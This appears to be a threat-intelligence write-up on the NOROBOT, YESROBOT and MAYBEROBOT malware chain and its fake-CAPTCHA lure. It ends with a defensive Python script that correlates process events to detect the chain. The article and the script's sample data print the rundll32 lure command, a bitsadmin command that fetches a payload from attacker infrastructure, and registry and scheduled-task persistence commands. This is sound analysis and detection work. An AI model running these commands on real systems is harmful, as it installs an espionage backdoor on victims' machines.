Over the summer of 2025, a novel malware family emerged following the public disclosure of the LOSTKEYS implant.
This new strain was rapidly weaponized in a series of highly targeted campaigns against policy advisors, non-governmental organizations, and dissidents.
Leveraging a refreshed lure known as COLDCOPY ClickFix, the threat actors disguised the payload as a CAPTCHA verification to trick users into executing a malicious DLL via rundll32.
Early samples demonstrated an aggressive development tempo marked by multiple iterations of the downloader component and backdoor stages.
Google Cloud analysts noted that the loader, dubbed NOROBOT, began deployment within days after LOSTKEYS was profiled.
Unlike its predecessor, which relied on a multi-stage PowerShell approach, NOROBOT invoked rundll32 iamnotarobot.dll,humanCheck to bootstrap the infection chain.
Subsequent stages fetched partial cryptography keys and complementary payloads from attacker-controlled infrastructure, recombining components to decrypt and install a Python backdoor, YESROBOT.
Initial operations saw YESROBOT deployed briefly in late May before being quickly replaced by a streamlined PowerShell backdoor, MAYBEROBOT.
This change addressed the detection noise created by a bundled Python interpreter and enabled more flexible command execution without requiring a full interpreter runtime.
Both backdoors maintained minimal built-in functions, relying on the operator to supply complex commands over HTTPS to a hardcoded command-and-control server.
Within months, the malware reached its third major iteration, exhibiting not only simplified delivery but also rotating infrastructure and file naming conventions to evade network defenders.
Figure: Malware development overview, illustrating the evolution from the initial complex downloader to the condensed logon script mechanism.
Figure: COLDCOPY attempting to lure the user into executing NOROBOT, showing the social engineering used to get targets to run a seemingly innocuous DLL.
Infection Mechanism
The infection begins when a user visits a compromised page posing as a custom CAPTCHA. The page prompts the user to run iamnotarobot.dll through rundll32, invoking the humanCheck export.
Once loaded, NOROBOT retrieves encrypted payload fragments via bitsadmin, for example:
bitsadmin /transfer downloadJob /download /priority normal https://inspectguarantee.org/libsystemhealthcheck.py %APPDATA%\libsystemhealthcheck.py
Next, the loader writes part of the AES key to the registry and schedules a task to assemble and decrypt the final payload.
This staged approach forces defenders to collect multiple artifacts—downloads, registry entries, scheduled tasks—to reconstruct the complete chain.
By splitting cryptographic keys and alternating downloader complexity, COLDRIVER maintains operational security while extracting intelligence from high-value targets.
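Because the chain is split across several living-off-the-land binaries, each stage is weak evidence on its own but strong when correlated per host. The following is an added detection example written for this article, not code from the original report or from Google's analysts. It runs over constructed Sysmon-style process-creation events (the file names and the inspectguarantee.org URL come from the article; the host names, timestamps, registry key, task name and benign noise events are invented for illustration) and flags a host where rundll32 loading a DLL from a user-writable path, a bitsadmin transfer of a script into the user profile, an HKCU registry write and a scheduled task pointing at the user profile all occur within a ten-minute window.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events in a Sysmon Event ID 1 shape. Hosts, times, the
# registry key and the task name are hypothetical; the DLL, export, URL and
# .py file name are the ones named in the article.
SAMPLE_EVENTS = [
    {"ts": "2025-06-03T09:14:02", "host": "WS01",
     "cmdline": r'rundll32 C:\Users\alice\Downloads\iamnotarobot.dll,humanCheck'},
    {"ts": "2025-06-03T09:14:05", "host": "WS01",
     "cmdline": r'bitsadmin /transfer downloadJob /download /priority normal '
                r'https://inspectguarantee.org/libsystemhealthcheck.py '
                r'C:\Users\alice\AppData\Roaming\libsystemhealthcheck.py'},
    {"ts": "2025-06-03T09:14:09", "host": "WS01",  # hypothetical key/value
     "cmdline": r'reg add HKCU\Software\HealthCheck /v k1 /t REG_SZ /d 4fa9c1e2'},
    {"ts": "2025-06-03T09:14:12", "host": "WS01",  # hypothetical task name
     "cmdline": r'schtasks /create /tn SysHealth /sc onlogon /tr '
                r'"C:\Users\alice\AppData\Roaming\python\python.exe '
                r'C:\Users\alice\AppData\Roaming\libsystemhealthcheck.py"'},
    # Benign noise: a system DLL export and a BITS download of an installer.
    {"ts": "2025-06-03T10:00:00", "host": "WS02",
     "cmdline": r'rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL'},
    {"ts": "2025-06-03T10:05:00", "host": "WS02",
     "cmdline": r'bitsadmin /transfer updJob /download /priority normal '
                r'https://example.com/update.msi C:\ProgramData\update.msi'},
]

# Paths an unprivileged user can write to; ProgramData is deliberately excluded.
USER_WRITABLE = re.compile(
    r"(\\Users\\[^\\]+\\(AppData|Downloads|Desktop|Documents)"
    r"|%APPDATA%|%LOCALAPPDATA%|%TEMP%|\\Temp\\)", re.I)
SCRIPT_EXT = (".py", ".ps1", ".vbs", ".js", ".hta")

RUNDLL_EXPORT = re.compile(r'rundll32(?:\.exe)?\s+"?(?P<dll>[^\s",]+\.dll)"?,(?P<export>\w+)', re.I)
BITS_TRANSFER = re.compile(r"bitsadmin(?:\.exe)?\s+/transfer\s+\S+.*?\s(?P<url>https?://\S+)\s+(?P<dest>\S+)\s*$", re.I)
REG_ADD_HKCU = re.compile(r"reg(?:\.exe)?\s+add\s+HKCU\\", re.I)
SCHTASKS_CREATE = re.compile(r'schtasks(?:\.exe)?\s+/create\b.*?/tr\s+"?(?P<action>[^"]+)', re.I)


def classify(event):
    """Map one process-creation event to a chain stage, or None if benign."""
    cmd = event["cmdline"]
    m = RUNDLL_EXPORT.search(cmd)
    if m and USER_WRITABLE.search(m.group("dll")):
        return "rundll32_user_dll"          # DLL+export loaded from a user path
    m = BITS_TRANSFER.search(cmd)
    if m and USER_WRITABLE.search(m.group("dest")) and m.group("dest").lower().endswith(SCRIPT_EXT):
        return "bits_script_download"       # BITS drops a script into the profile
    m = SCHTASKS_CREATE.search(cmd)
    if m and USER_WRITABLE.search(m.group("action")):
        return "schtask_user_path"          # persistence pointing at a user path
    if REG_ADD_HKCU.search(cmd):
        return "hkcu_value_write"           # weak signal; only counts in a chain
    return None


def correlate(events, window=timedelta(minutes=10), min_stages=3):
    """Raise one alert per host where >= min_stages distinct stages land in `window`."""
    by_host = defaultdict(list)
    for e in events:
        stage = classify(e)
        if stage:
            by_host[e["host"]].append((datetime.fromisoformat(e["ts"]), stage, e["cmdline"]))
    alerts = []
    for host, hits in by_host.items():
        hits.sort()
        for i, (t0, _, _) in enumerate(hits):
            in_window = [h for h in hits[i:] if h[0] - t0 <= window]
            stages = {h[1] for h in in_window}
            # Require a delivery stage so a lone HKCU write never fires.
            if len(stages) >= min_stages and stages & {"rundll32_user_dll", "bits_script_download"}:
                alerts.append({"host": host, "stages": sorted(stages),
                               "start": t0.isoformat(), "end": in_window[-1][0].isoformat(),
                               "evidence": [h[2] for h in in_window]})
                break  # one alert per host chain
    return alerts


if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert["host"], alert["stages"], alert["start"], "->", alert["end"])
```

The per-stage regexes are intentionally loose (any export name, any URL) because the article notes that file names and infrastructure rotate between iterations; the signal comes from the sequence, not from the specific strings, so the same logic keeps working when iamnotarobot.dll is renamed.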